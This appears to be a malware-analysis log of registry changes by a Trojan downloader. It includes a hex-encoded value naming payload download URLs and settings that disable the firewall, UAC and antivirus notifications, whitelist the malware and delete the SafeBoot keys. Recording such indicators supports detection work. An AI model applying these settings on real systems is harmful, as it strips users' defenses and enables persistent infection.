[HKCU\Software\Stvncyfrlda\168128873]
"1821809806" = "0200687474703A2F2F736C776F6366642F736F62616B61312E67696600687474703A2F2F34362E3130352E3130332E3231392F736F62616B61766F6C6F732E676966"
[HKCU\Software\Stvncyfrlda]
"m4_519" = "2967725563"
"m4_640" = "2484506752"
"m4_641" = "4219797485"
"m4_642" = "1660120922"
"m4_643" = "3395411655"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Stvncyfrlda]
"m1_108" = "2805205673"
"m1_109" = "209572100"
"m1_102" = "1815568211"
"m1_103" = "2138095271"
"m1_100" = "3568094242"
"m1_101" = "3977301451"
"m1_106" = "1566012015"
"m1_107" = "2458633683"
"m1_104" = "2160341791"
"m1_105" = "3589831327"
"m1_218" = "3181364844"
"m1_219" = "3675371188"
"m1_216" = "2002974020"
"m1_217" = "2522771582"
"m1_214" = "769808456"
"m1_215" = "1567563218"
"m1_212" = "3868294399"
"m1_213" = "486374671"
"m1_210" = "3246919505"
"m1_211" = "267335146"
"m2_509" = "2794691734"
"m2_508" = "1059390846"
"m2_501" = "1797262862"
"m2_500" = "61979692"
"m2_503" = "972879383"
"m2_502" = "3532549682"
"m2_505" = "148495649"
"m2_504" = "2708162953"
"m2_507" = "3619075220"
"m2_506" = "1883778963"
"m3_508" = "1042708069"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"
[HKCU\Software\Stvncyfrlda]
"m3_509" = "2811290000"
"m3_599" = "40227362"
"m1_634" = "3486355108"
"m1_538" = "2635294892"
"m1_635" = "2425979515"
"m1_636" = "3137636771"
"m1_637" = "2125334093"
"m1_630" = "1018182745"
"m1_631" = "940518810"
"m1_632" = "3162961604"
"m1_633" = "22606794"
"m3_502" = "3549238679"
"m3_258" = "1011818995"
"m3_259" = "2780418414"
"m3_503" = "956269826"
"m3_250" = "14400091"
"m3_251" = "1749308918"
"m3_252" = "3518416229"
"m3_253" = "958887056"
"m3_254" = "2660361231"
"m3_255" = "100898746"
"m3_256" = "1869350697"
"m3_257" = "3571365444"
"m4_114" = "254647946"
"m4_115" = "1989938679"
"m4_116" = "3725229412"
"m4_117" = "1165552849"
"m4_110" = "1903419606"
"m4_111" = "3638710339"
"m4_112" = "1079033776"
"m4_113" = "2814324509"
"m4_118" = "2900843582"
"m4_119" = "341167019"
"m4_74" = "3857462658"
"m4_75" = "1297786095"
"m4_76" = "3033076828"
"m4_77" = "473400265"
"m4_70" = "1211267022"
"m4_71" = "2946557755"
"m4_72" = "386881192"
"m4_73" = "2122171925"
"m4_78" = "2208690998"
"m4_79" = "3943981731"
"m3_418" = "3813836243"
"m3_419" = "1220752718"
"m3_416" = "309754633"
"m3_417" = "2078337700"
"m3_414" = "1167808623"
"m3_415" = "2902838170"
"m3_412" = "1958230341"
"m3_413" = "3693783280"
"m3_410" = "2816286395"
"m3_411" = "256870870"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Stvncyfrlda]
"m4_338" = "2412715498"
"m4_339" = "4148006231"
"m4_628" = "3135854436"
"m4_629" = "576177873"
"m4_334" = "4061487158"
"m4_335" = "1501810595"
"m4_336" = "3237101328"
"m4_337" = "677424765"
"m4_330" = "1415291522"
"m4_331" = "3150582255"
"m4_332" = "590905692"
"m4_333" = "2326196425"
"m2_291" = "2458433879"
"m2_290" = "723135046"
"m2_293" = "1634049847"
"m2_292" = "4193717619"
"m2_295" = "809660825"
"m2_294" = "3369331314"
"m2_297" = "4280245633"
"m2_296" = "2544944037"
"m2_299" = "3455860219"
"m2_298" = "1720559950"
"m4_240" = "4152915504"
"m4_241" = "1593238941"
"m4_242" = "3328529674"
"m4_243" = "768853111"
"m4_244" = "2504143844"
"m4_245" = "4239434577"
"m4_246" = "1679758014"
"m4_247" = "3415048747"
"m4_248" = "855372184"
"m4_249" = "2590662917"
"m2_343" = "2499238095"
"m2_342" = "763940510"
"m2_341" = "3323623702"
"m2_340" = "1588323938"
"m2_347" = "850466783"
"m2_346" = "3410134774"
"m2_345" = "1674854037"
"m2_344" = "4234521990"
"m2_349" = "26082517"
"m2_348" = "2585748047"
"m2_76" = "3033075308"
"m2_77" = "473407197"
"m2_74" = "3857460319"
"m2_75" = "1297791275"
"m2_72" = "386889296"
"m2_73" = "2122176586"
"m2_70" = "1211257349"
"m2_71" = "2946564003"
"m2_78" = "2208688458"
"m2_79" = "3943988025"
"m3_57" = "110470508"
"m3_56" = "2703963633"
"m3_55" = "968530498"
"m3_54" = "3494439639"
"m3_53" = "1759411128"
"m3_52" = "57526285"
"m3_51" = "2583910558"
"m3_50" = "848472419"
"m3_59" = "3614491702"
"m3_58" = "1845908635"
"m1_458" = "3133317052"
"m1_459" = "1208491964"
"m1_450" = "1361678881"
"m1_451" = "1526833880"
"m1_452" = "833524768"
"m1_453" = "3835836132"
"m1_454" = "3851259889"
"m1_455" = "2866618880"
"m1_456" = "3417690718"
"m1_457" = "3237286689"
"m3_225" = "3909911780"
"m3_224" = "2174883145"
"m1_283" = "4243454667"
"m1_282" = "1784829856"
"m3_221" = "1263885104"
"m3_220" = "3823414149"
"m1_287" = "891347586"
"m1_286" = "2389819315"
"m2_192" = "2463337646"
"m2_193" = "4198634025"
"m2_190" = "3287721954"
"m2_191" = "728041369"
"m2_196" = "814570720"
"m2_197" = "2549852496"
"m2_194" = "1638950371"
"m2_195" = "3374250535"
"m2_198" = "4285151358"
"m2_199" = "1725467531"
"m3_609" = "213153892"
"m3_608" = "2806761673"
"m3_632" = "1503690545"
"m3_573" = "2200702160"
"m1_119" = "4180686801"
"m1_118" = "1810627919"
"m1_115" = "667707718"
"m1_114" = "320218196"
"m1_117" = "3661701600"
"m1_116" = "3591112201"
"m1_111" = "115559167"
"m1_110" = "3447796255"
"m1_113" = "3476791107"
"m1_112" = "2031211741"
"m2_578" = "2270659906"
"m2_579" = "4005960282"
"m2_574" = "3919431900"
"m2_575" = "1359761722"
"m2_576" = "3095047996"
"m2_577" = "535379312"
"m2_570" = "1273234129"
"m2_571" = "3008535883"
"m2_572" = "448848378"
"m2_573" = "2184147725"
"m1_201" = "3482801339"
"m1_200" = "2612394746"
"m1_203" = "3258441780"
"m1_202" = "186904953"
"m1_205" = "3574338832"
"m1_204" = "3978937446"
"m1_207" = "123795998"
"m1_206" = "874949549"
"m1_209" = "1441688483"
"m1_208" = "1666636253"
"m3_633" = "3239243436"
"m2_400" = "2626554019"
"m2_401" = "66886345"
"m2_402" = "1802168782"
"m2_403" = "3537468670"
"m2_404" = "977783452"
"m2_405" = "2713083769"
"m2_406" = "153396217"
"m2_407" = "1888697407"
"m2_408" = "3623979778"
"m2_409" = "1064309300"
"m3_249" = "2607352620"
"m3_248" = "871930801"
"m3_243" = "751873630"
"m3_242" = "3345366819"
"m3_241" = "1609928628"
"m3_240" = "4136311833"
"m3_247" = "3398363138"
"m3_246" = "1696364695"
"m3_245" = "4256418168"
"m3_244" = "2487310797"
"m1_577" = "2193656748"
"m4_107" = "992514703"
"m4_106" = "3552191266"
"m4_105" = "1816900533"
"m4_104" = "81609800"
"m4_103" = "2641286363"
"m4_102" = "905995630"
"m4_101" = "3465672193"
"m4_100" = "1730381460"
"m4_109" = "168128873"
"m4_108" = "2727805436"
"m4_41" = "2427443317"
"m4_40" = "692152584"
"m4_43" = "1603057487"
"m4_42" = "4162734050"
"m4_45" = "778671657"
"m4_44" = "3338348220"
"m4_47" = "4249253123"
"m4_46" = "2513962390"
"m4_49" = "3424867293"
"m4_48" = "1689576560"
"m3_444" = "1653222181"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Stvncyfrlda]
"m4_631" = "4046759339"
"m4_630" = "2311468606"
"m4_633" = "3222373509"
"m4_632" = "1487082776"
"m4_635" = "2397987679"
"m4_634" = "662696946"
"m4_637" = "1573601849"
"m4_636" = "4133278412"
"m4_639" = "749216019"
"m4_638" = "3308892582"
"m2_240" = "4152911792"
"m2_88" = "2381733106"
"m4_329" = "3974968085"
"m4_328" = "2239677352"
"m4_327" = "504386619"
"m4_326" = "3064063182"
"m4_325" = "1328772449"
"m4_324" = "3888449012"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKCU\Software\Stvncyfrlda]
"m4_322" = "417867546"
"m4_321" = "2977544109"
"m4_320" = "1242253376"
"m3_557" = "172694016"
"m3_568" = "2080658417"
"m4_450" = "3491749274"
"m3_642" = "1676674419"
"m3_555" = "1030290278"
"m1_476" = "225555419"
"m3_554" = "3590212555"
"m3_441" = "742299884"
"m2_81" = "3119602972"
"m3_552" = "119744801"
"m2_80" = "1384301449"
"m3_551" = "2679290290"
"m4_456" = "1018591784"
"m4_253" = "941891257"
"m4_252" = "3501567820"
"m4_251" = "1766277087"
"m4_250" = "30986354"
"m4_257" = "3588086893"
"m4_256" = "1852796160"
"m4_255" = "117505427"
"m4_254" = "2677181990"
"m4_259" = "2763701063"
"m4_258" = "1028410330"
"m1_605" = "3575383367"
"m2_376" = "3929258582"
"m2_377" = "1369572240"
"m2_374" = "458675037"
"m2_375" = "2193960198"
"m2_372" = "1283057456"
"m2_373" = "3018343341"
"m2_370" = "2107446614"
"m2_371" = "3842729037"
"m2_638" = "3308891404"
"m2_378" = "3104871443"
"m2_379" = "545186334"
"m3_443" = "4246322102"
"m3_44" = "3354938517"
"m3_45" = "795540480"
"m3_46" = "2497408959"
"m3_47" = "4232388394"
"m3_40" = "675414817"
"m3_41" = "2444014172"
"m3_42" = "4179439051"
"m3_43" = "1586486630"
"m3_48" = "1706528345"
"m3_49" = "3441441268"
"m2_632" = "1487080660"
"m1_449" = "4171068900"
"m1_448" = "1138312456"
"m1_443" = "4188646601"
"m1_442" = "1520599900"
"m1_441" = "3984958689"
"m1_440" = "1208492590"
"m1_447" = "1667272008"
"m1_446" = "2160477276"
"m1_445" = "2224877252"
"m1_444" = "833232183"
"m3_569" = "3849765740"
"m3_623" = "3032629354"
"m1_601" = "3904991114"
"m2_185" = "3201209192"
"m2_184" = "1465922450"
"m2_187" = "2376823211"
"m2_186" = "641527389"
"m2_181" = "555014882"
"m2_180" = "3114681450"
"m2_183" = "4025594545"
"m2_182" = "2290296618"
"m2_189" = "1552439344"
"m2_188" = "4112109298"
"m1_607" = "203879939"
"m1_600" = "2359956036"
"m3_563" = "1994155678"
"m3_482" = "3169755411"
"m3_484" = "2378809405"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKCU\Software\Stvncyfrlda]
"m4_626" = "3960240266"
"m3_457" = "2770830268"
"m4_627" = "1400563703"
"m2_569" = "3832920627"
"m2_568" = "2097618949"
"m2_567" = "362337589"
"m2_566" = "2922007399"
"m2_565" = "1186722713"
"m2_564" = "3746392208"
"m2_563" = "2011110715"
"m2_562" = "275811940"
"m2_561" = "2835495118"
"m2_560" = "1100196542"
"m4_624" = "489658800"
"m1_274" = "1210769380"
"m1_275" = "2098659134"
"m1_276" = "2829838510"
"m1_277" = "938317364"
"m1_270" = "2497538701"
"m1_271" = "1732347051"
"m1_272" = "902960287"
"m1_273" = "55513673"
"m1_278" = "1114295082"
"m1_279" = "1262554309"
"m1_308" = "3818216428"
"m4_235" = "4066396431"
"m4_625" = "2224949533"
"m4_234" = "2331105698"
"m1_300" = "3947191924"
"m1_301" = "849689875"
"m1_302" = "1338118699"
"m1_303" = "2483050397"
"m1_304" = "2093725780"
"m1_305" = "297731501"
"m1_306" = "3948505893"
"m1_307" = "3182479559"
"m2_413" = "3710507780"
"m2_412" = "1975206996"
"m2_411" = "239925955"
"m2_410" = "2799594930"
"m2_417" = "2061734157"
"m2_416" = "326437227"
"m2_415" = "2886119579"
"m2_414" = "1150821631"
"m2_419" = "1237351085"
"m2_418" = "3797021408"
"m3_278" = "1357802103"
"m3_279" = "3092776418"
"m3_276" = "2182302637"
"m3_277" = "3950901976"
"m3_274" = "3039832195"
"m3_275" = "446879806"
"m3_272" = "3830778361"
"m3_273" = "1304934676"
"m3_270" = "393932511"
"m3_271" = "2095357514"
"m1_61" = "1627026341"
"m2_515" = "321531983"
"m4_239" = "2417624771"
"m4_645" = "2571025825"
"m4_238" = "682334038"
"m4_138" = "3246919874"
"m4_139" = "687243311"
"m4_132" = "1425110068"
"m4_133" = "3160400801"
"m4_130" = "2249495898"
"m4_131" = "3984786631"
"m4_136" = "4071305704"
"m4_137" = "1511629141"
"m4_134" = "600724238"
"m4_135" = "2336014971"
"m3_474" = "2205754875"
"m3_475" = "3907769622"
"m3_476" = "1347699845"
"m3_477" = "3116823600"
"m3_470" = "3854825527"
"m3_471" = "1294756770"
"m3_472" = "2996706001"
"m3_473" = "436767308"
"m3_478" = "557279151"
"m3_479" = "2258704090"
"m4_58" = "1862614706"
"m4_59" = "3597905439"
"m4_56" = "2687000536"
"m4_57" = "127323973"
"m4_54" = "3511386366"
"m4_55" = "951709803"
"m4_52" = "40804900"
"m4_53" = "1776095633"
"m4_50" = "865190730"
"m4_51" = "2600481463"
"m3_452" = "2684343901"
"m3_184" = "1449360497"
"m3_185" = "3217944556"
"m3_186" = "658480923"
"m3_187" = "2359824054"
"m3_180" = "3097834125"
"m3_181" = "538419768"
"m3_182" = "2306891095"
"m3_183" = "4008889538"
"m3_188" = "4095393317"
"m3_189" = "1569401168"
"m1_39" = "2609756136"
"m1_38" = "2976799124"
"m4_312" = "244829400"
"m4_313" = "1980120133"
"m4_310" = "1069215230"
"m4_311" = "2804505963"
"m4_316" = "2891025036"
"m4_317" = "331348473"
"m4_314" = "3715410866"
"m4_315" = "1155734303"
"m4_622" = "1314044630"
"m4_318" = "2066639206"
"m4_319" = "3801929939"
"m3_453" = "124273096"
"m4_623" = "3049335363"
"m4_482" = "3186477882"
"m4_483" = "626801319"
"m4_480" = "4010863712"
"m4_481" = "1451187149"
"m4_486" = "1537706222"
"m4_487" = "3272996955"
"m4_484" = "2362092052"
"m4_485" = "4097382785"
"m3_500" = "45271757"
"m3_501" = "1780710008"
"m4_488" = "713320392"
"m4_489" = "2448611125"
"m3_504" = "2691183793"
"m3_505" = "165323820"
"m3_506" = "1900762971"
"m3_507" = "3602237174"
"m3_450" = "3508320179"
"m3_451" = "915220270"
"m4_266" = "2025834306"
"m4_267" = "3761125039"
"m4_264" = "2850220136"
"m4_265" = "290543573"
"m4_262" = "3674605966"
"m4_263" = "1114929403"
"m4_260" = "204024500"
"m4_261" = "1939315233"
"m4_268" = "1201448476"
"m4_269" = "2936739209"
"m2_369" = "372148218"
"m2_368" = "2931833564"
"m3_456" = "1035276289"
"m2_361" = "3669701569"
"m2_360" = "1934405142"
"m2_363" = "2845303912"
"m2_362" = "1110018260"
"m2_365" = "2020917661"
"m2_364" = "285637201"
"m2_367" = "1196531800"
"m2_366" = "3756218818"
"m2_10" = "173035032"
"m2_11" = "1908332309"
"m2_12" = "3643615059"
"m2_13" = "1083947171"
"m2_14" = "2819228657"
"m2_15" = "259562542"
"m2_16" = "1994846042"
"m2_17" = "3730142537"
"m2_18" = "1170459854"
"m2_19" = "2905759448"
"m3_71" = "2929954066"
"m3_70" = "1227955687"
"m3_73" = "2139008060"
"m3_72" = "369900673"
"m3_75" = "1280954054"
"m3_74" = "3840892843"
"m3_77" = "490007008"
"m3_76" = "3049946741"
"m3_79" = "3927378058"
"m3_78" = "2191956255"
"m1_478" = "3509216701"
"m1_479" = "1917390907"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"
[HKCU\Software\Stvncyfrlda]
"m1_477" = "3871147985"
"m1_474" = "3855502793"
"m1_475" = "1245554344"
"m1_472" = "3973280739"
"m1_473" = "1962184746"
"m1_470" = "146288749"
"m1_471" = "1854399063"
"m3_454" = "1826287975"
"m3_553" = "1821235292"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Stvncyfrlda]
"m3_455" = "3561709714"
"m1_610" = "1163057877"
"m2_178" = "3939068130"
"m2_179" = "1379399389"
"m1_611" = "599832830"
"m2_170" = "2941640920"
"m2_171" = "381974444"
"m2_172" = "2117257690"
"m2_173" = "3852556196"
"m2_174" = "1292873222"
"m2_175" = "3028169473"
"m2_176" = "468487962"
"m2_177" = "2203785988"
"m3_488" = "730271201"
"m1_616" = "3327985631"
"m3_550" = "910167559"
[HKCU\Software\Stvncyfrlda\168128873]
"86519073" = "67"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\termservice]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\TDI]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Browser]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SCSI Class]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBT]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sr.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WinMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\File system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmserver]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\EventLog]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Messenger]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Ndisuio]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SharedAccess]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\RpcSs]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SCSI Class]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Tcpip]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot file system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PNP Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\CryptSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Primary disk]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Netlogon]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vga.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\HelpSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Primary disk]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WZCSVC]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmserver]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\System Bus Extender]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetMan]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Base]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\File system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmadmin]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AppMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanServer]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AFD]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Base]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DnsCache]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PlugPlay]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmadmin]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Dhcp]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmload.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SRService]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\nm.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmio.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\RpcSs]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\nm]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\EventLog]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Network]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LmHosts]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Filter]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SRService]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOS]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys]
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Control\SafeBoot]
"AlternateShell"
The process a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 09 DF D0 83 3F 87 AD 9E B9 C8 23 ED B1 07 36"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The process Sense-codedownloader.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
